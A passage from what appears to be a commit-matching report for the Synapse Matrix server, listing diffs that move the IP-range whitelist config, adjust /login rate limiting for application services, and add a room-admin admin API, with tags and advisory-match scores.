"synapse/config/federation.py", + "synapse/config/repository.py", + "synapse/config/server.py", + "synapse/server.py", + "tests/replication/test_multi_media_repo.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8870": "Use an empty ip_range_blacklist to allow connecting to localhost. matrix-org/sytest#987 Fix the sample config location for the ip_range_whitelist setting. #8954 don't apply blacklist to proxy connections #9084 Convert blacklisted IPv4 addresses to compatible IPv6 addresses. #9240" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_IS_SECURITY_RELEVANT", + "message": "", + "relevance": 32 + }, + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8870, 8870", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: setting", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server, federation", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8870", + "relevance": 2 + } + ] + }, + { + "commit_id": "44b7d4c6d6d5e8d78bd0154b407defea4a35aebd", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608147647, + "hunks": 5, + "message": "Fix the sample config location for the ip_range_whitelist setting. (#8954) Move it from the federation section to the server section to match ip_range_blacklist.", + "diff": [ + "diff --git a/changelog.d/8954.feature b/changelog.d/8954.feature", + "new file mode 100644", + "index 000000000..39f53174a", + "--- /dev/null", + "+++ b/changelog.d/8954.feature", + "@@ -0,0 +1 @@", + "+Apply an IP range blacklist to push and key revocation requests.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index f196781c1..75a01094d 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -175,2 +175,14 @@ pid_file: DATADIR/homeserver.pid", + "+# List of IP address CIDR ranges that should be allowed for federation,", + "+# identity servers, push servers, and for checking key validity for", + "+# third-party invite events. This is useful for specifying exceptions to", + "+# wide-ranging blacklisted target IP ranges - e.g. for communication with", + "+# a push server only visible in your network.", + "+#", + "+# This whitelist overrides ip_range_blacklist and defaults to an empty", + "+# list.", + "+#", + "+#ip_range_whitelist:", + "+# - '192.168.1.1'", + "+", + " # List of ports that Synapse should listen on, their purpose and their", + "@@ -673,14 +685,2 @@ acme:", + "-# List of IP address CIDR ranges that should be allowed for federation,", + "-# identity servers, push servers, and for checking key validity for", + "-# third-party invite events. This is useful for specifying exceptions to", + "-# wide-ranging blacklisted target IP ranges - e.g. for communication with", + "-# a push server only visible in your network.", + "-#", + "-# This whitelist overrides ip_range_blacklist and defaults to an empty", + "-# list.", + "-#", + "-#ip_range_whitelist:", + "-# - '192.168.1.1'", + "-", + " # Report prometheus metrics on the age of PDUs being sent to and received from", + "diff --git a/synapse/config/federation.py b/synapse/config/federation.py", + "index a03a419e2..9f3c57e6a 100644", + "--- a/synapse/config/federation.py", + "+++ b/synapse/config/federation.py", + "@@ -58,14 +58,2 @@ class FederationConfig(Config):", + "- # List of IP address CIDR ranges that should be allowed for federation,", + "- # identity servers, push servers, and for checking key validity for", + "- # third-party invite events. This is useful for specifying exceptions to", + "- # wide-ranging blacklisted target IP ranges - e.g. for communication with", + "- # a push server only visible in your network.", + "- #", + "- # This whitelist overrides ip_range_blacklist and defaults to an empty", + "- # list.", + "- #", + "- #ip_range_whitelist:", + "- # - '192.168.1.1'", + "-", + " # Report prometheus metrics on the age of PDUs being sent to and received from", + "diff --git a/synapse/config/server.py b/synapse/config/server.py", + "index f3815e5ad..7242a4aa8 100644", + "--- a/synapse/config/server.py", + "+++ b/synapse/config/server.py", + "@@ -834,2 +834,14 @@ class ServerConfig(Config):", + "+ # List of IP address CIDR ranges that should be allowed for federation,", + "+ # identity servers, push servers, and for checking key validity for", + "+ # third-party invite events. This is useful for specifying exceptions to", + "+ # wide-ranging blacklisted target IP ranges - e.g. for communication with", + "+ # a push server only visible in your network.", + "+ #", + "+ # This whitelist overrides ip_range_blacklist and defaults to an empty", + "+ # list.", + "+ #", + "+ #ip_range_whitelist:", + "+ # - '192.168.1.1'", + "+", + " # List of ports that Synapse should listen on, their purpose and their" + ], + "changed_files": [ + "changelog.d/8954.feature", + "docs/sample_config.yaml", + "synapse/config/federation.py", + "synapse/config/server.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8954": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_IS_SECURITY_RELEVANT", + "message": "", + "relevance": 32 + }, + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8954, 8954", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: server, setting, federation", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server, federation", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8954", + "relevance": 2 + } + ] + }, + { + "commit_id": "a8eceb01e59fcbddcea7d19031ed2392772e6d66", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607704411, + "hunks": 20, + "message": "Honour AS ratelimit settings for /login requests (#8920) Fixes #8846.", + "diff": [ + "diff --git a/changelog.d/8920.bugfix b/changelog.d/8920.bugfix", + "new file mode 100644", + "index 000000000..abcf186bd", + "--- /dev/null", + "+++ b/changelog.d/8920.bugfix", + "@@ -0,0 +1 @@", + "+Fix login API to not ratelimit application services that have ratelimiting disabled.", + "diff --git a/synapse/api/auth.py b/synapse/api/auth.py", + "index bfcaf68b2..1951f6e17 100644", + "--- a/synapse/api/auth.py", + "+++ b/synapse/api/auth.py", + "@@ -33,3 +33,5 @@ from synapse.api.errors import (", + " from synapse.api.room_versions import KNOWN_ROOM_VERSIONS", + "+from synapse.appservice import ApplicationService", + " from synapse.events import EventBase", + "+from synapse.http.site import SynapseRequest", + " from synapse.logging import opentracing as opentracing", + "@@ -476,3 +478,3 @@ class Auth:", + "- def get_appservice_by_req(self, request):", + "+ def get_appservice_by_req(self, request: SynapseRequest) -> ApplicationService:", + " token = self.get_access_token_from_request(request)", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index afae6d327..62f98dabc 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -24,2 +24,3 @@ from typing import (", + " Any,", + "+ Awaitable,", + " Callable,", + "@@ -863,3 +864,3 @@ class AuthHandler(BaseHandler):", + " self, login_submission: Dict[str, Any], ratelimit: bool = False,", + "- ) -> Tuple[str, Optional[Callable[[Dict[str, str]], None]]]:", + "+ ) -> Tuple[str, Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", + " \"\"\"Authenticates the user for the /login API", + "@@ -1006,3 +1007,3 @@ class AuthHandler(BaseHandler):", + " self, username: str, login_submission: Dict[str, Any],", + "- ) -> Tuple[str, Optional[Callable[[Dict[str, str]], None]]]:", + "+ ) -> Tuple[str, Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", + " \"\"\"Helper for validate_login", + "@@ -1084,3 +1085,3 @@ class AuthHandler(BaseHandler):", + " self, medium: str, address: str, password: str", + "- ) -> Tuple[Optional[str], Optional[Callable[[Dict[str, str]], None]]]:", + "+ ) -> Tuple[Optional[str], Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", + " \"\"\"Check if a password provider is able to validate a thirdparty login", + "diff --git a/synapse/rest/client/v1/login.py b/synapse/rest/client/v1/login.py", + "index d7ae14821..5f4c6703d 100644", + "--- a/synapse/rest/client/v1/login.py", + "+++ b/synapse/rest/client/v1/login.py", + "@@ -16,3 +16,3 @@", + " import logging", + "-from typing import Awaitable, Callable, Dict, Optional", + "+from typing import TYPE_CHECKING, Awaitable, Callable, Dict, Optional", + "@@ -32,2 +32,5 @@ from synapse.types import JsonDict, UserID", + "+if TYPE_CHECKING:", + "+ from synapse.server import HomeServer", + "+", + " logger = logging.getLogger(__name__)", + "@@ -44,3 +47,3 @@ class LoginRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " super().__init__()", + "@@ -107,4 +110,2 @@ class LoginRestServlet(RestServlet):", + " async def on_POST(self, request: SynapseRequest):", + "- self._address_ratelimiter.ratelimit(request.getClientIP())", + "-", + " login_submission = parse_json_object_from_request(request)", + "@@ -114,2 +115,6 @@ class LoginRestServlet(RestServlet):", + " appservice = self.auth.get_appservice_by_req(request)", + "+", + "+ if appservice.is_rate_limited():", + "+ self._address_ratelimiter.ratelimit(request.getClientIP())", + "+", + " result = await self._do_appservice_login(login_submission, appservice)", + "@@ -119,6 +124,9 @@ class LoginRestServlet(RestServlet):", + " ):", + "+ self._address_ratelimiter.ratelimit(request.getClientIP())", + " result = await self._do_jwt_login(login_submission)", + " elif login_submission[\"type\"] == LoginRestServlet.TOKEN_TYPE:", + "+ self._address_ratelimiter.ratelimit(request.getClientIP())", + " result = await self._do_token_login(login_submission)", + " else:", + "+ self._address_ratelimiter.ratelimit(request.getClientIP())", + " result = await self._do_other_login(login_submission)", + "@@ -161,3 +169,5 @@ class LoginRestServlet(RestServlet):", + "- return await self._complete_login(qualified_user_id, login_submission)", + "+ return await self._complete_login(", + "+ qualified_user_id, login_submission, ratelimit=appservice.is_rate_limited()", + "+ )", + "@@ -196,2 +206,3 @@ class LoginRestServlet(RestServlet):", + " create_non_existent_users: bool = False,", + "+ ratelimit: bool = True,", + " ) -> Dict[str, str]:", + "@@ -210,2 +221,3 @@ class LoginRestServlet(RestServlet):", + " exist. Defaults to False.", + "+ ratelimit: Whether to ratelimit the login request.", + "@@ -218,3 +230,4 @@ class LoginRestServlet(RestServlet):", + " # necessarily know the user before now.", + "- self._account_ratelimiter.ratelimit(user_id.lower())", + "+ if ratelimit:", + "+ self._account_ratelimiter.ratelimit(user_id.lower())" + ], + "changed_files": [ + "changelog.d/8920.bugfix", + "synapse/api/auth.py", + "synapse/handlers/auth.py", + "synapse/rest/client/v1/login.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8920": "", + "8846": "Honour AS ratelimit settings for /login requests #8920" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_IS_SECURITY_RELEVANT", + "message": "", + "relevance": 32 + }, + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8920, 8920", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: setting, request", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8920, 8846", + "relevance": 2 + } + ] + }, + { + "commit_id": "d781a81e692563c5785e3efd4aa2487696b9c995", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608305839, + "hunks": 8, + "message": "Allow server admin to get admin bit in rooms where local user is an admin (#8756) This adds an admin API that allows a server admin to get power in a room if a local user has power in a room. Will also invite the user if they're not in the room and its a private room. Can specify another user (rather than the admin user) to be granted power. Co-authored-by: Matthew Hodgson ", + "diff": [ + "diff --git a/changelog.d/8756.feature b/changelog.d/8756.feature", + "new file mode 100644", + "index 000000000..03eb79fb0", + "--- /dev/null", + "+++ b/changelog.d/8756.feature", + "@@ -0,0 +1 @@", + "+Add admin API that lets server admins get power in rooms in which local users have power.", + "diff --git a/synapse/rest/admin/__init__.py b/synapse/rest/admin/__init__.py", + "index 55ddebb4f..6f7dc0650 100644", + "--- a/synapse/rest/admin/__init__.py", + "+++ b/synapse/rest/admin/__init__.py", + "@@ -40,2 +40,3 @@ from synapse.rest.admin.rooms import (", + " ListRoomRestServlet,", + "+ MakeRoomAdminRestServlet,", + " RoomMembersRestServlet,", + "@@ -230,2 +231,3 @@ def register_servlets(hs, http_server):", + " PushersRestServlet(hs).register(http_server)", + "+ MakeRoomAdminRestServlet(hs).register(http_server)", + "diff --git a/synapse/rest/admin/rooms.py b/synapse/rest/admin/rooms.py", + "index b902af802..ab7cc9102 100644", + "--- a/synapse/rest/admin/rooms.py", + "+++ b/synapse/rest/admin/rooms.py", + "@@ -18,4 +18,4 @@ from typing import TYPE_CHECKING, List, Optional, Tuple", + "-from synapse.api.constants import EventTypes, JoinRules", + "-from synapse.api.errors import Codes, NotFoundError, SynapseError", + "+from synapse.api.constants import EventTypes, JoinRules, Membership", + "+from synapse.api.errors import AuthError, Codes, NotFoundError, SynapseError", + " from synapse.http.servlet import (", + "@@ -39,2 +39,3 @@ if TYPE_CHECKING:", + "+", + " logger = logging.getLogger(__name__)", + "@@ -369 +370,132 @@ class JoinRoomAliasServlet(RestServlet):", + " return 200, {\"room_id\": room_id}", + "+", + "+", + "+class MakeRoomAdminRestServlet(RestServlet):", + "+ \"\"\"Allows a server admin to get power in a room if a local user has power in", + "+ a room. Will also invite the user if they're not in the room and it's a", + "+ private room. Can specify another user (rather than the admin user) to be", + "+ granted power, e.g.:", + "+", + "+ POST/_synapse/admin/v1/rooms//make_room_admin", + "+ {", + "+ \"user_id\": \"@foo:example.com\"", + "+ }", + "+ \"\"\"", + "+", + "+ PATTERNS = admin_patterns(\"/rooms/(?P[^/]*)/make_room_admin\")", + "+", + "+ def __init__(self, hs: \"HomeServer\"):", + "+ self.hs = hs", + "+ self.auth = hs.get_auth()", + "+ self.room_member_handler = hs.get_room_member_handler()", + "+ self.event_creation_handler = hs.get_event_creation_handler()", + "+ self.state_handler = hs.get_state_handler()", + "+ self.is_mine_id = hs.is_mine_id", + "+", + "+ async def on_POST(self, request, room_identifier):", + "+ requester = await self.auth.get_user_by_req(request)", + "+ await assert_user_is_admin(self.auth, requester.user)", + "+ content = parse_json_object_from_request(request, allow_empty_body=True)", + "+", + "+ # Resolve to a room ID, if necessary.", + "+ if RoomID.is_valid(room_identifier):", + "+ room_id = room_identifier", + "+ elif RoomAlias.is_valid(room_identifier):", + "+ room_alias = RoomAlias.from_string(room_identifier)", + "+ room_id, _ = await self.room_member_handler.lookup_room_alias(room_alias)", + "+ room_id = room_id.to_string()", + "+ else:", + "+ raise SynapseError(", + "+ 400, \"%s was not legal room ID or room alias\" % (room_identifier,)", + "+ )", + "+", + "+ # Which user to grant room admin rights to.", + "+ user_to_add = content.get(\"user_id\", requester.user.to_string())", + "+", + "+ # Figure out which local users currently have power in the room, if any.", + "+ room_state = await self.state_handler.get_current_state(room_id)", + "+ if not room_state:", + "+ raise SynapseError(400, \"Server not in room\")", + "+", + "+ create_event = room_state[(EventTypes.Create, \"\")]", + "+ power_levels = room_state.get((EventTypes.PowerLevels, \"\"))", + "+", + "+ if power_levels is not None:", + "+ # We pick the local user with the highest power.", + "+ user_power = power_levels.content.get(\"users\", {})", + "+ admin_users = [", + "+ user_id for user_id in user_power if self.is_mine_id(user_id)", + "+ ]", + "+ admin_users.sort(key=lambda user: user_power[user])", + "+", + "+ if not admin_users:", + "+ raise SynapseError(400, \"No local admin user in room\")", + "+", + "+ admin_user_id = admin_users[-1]", + "+", + "+ pl_content = 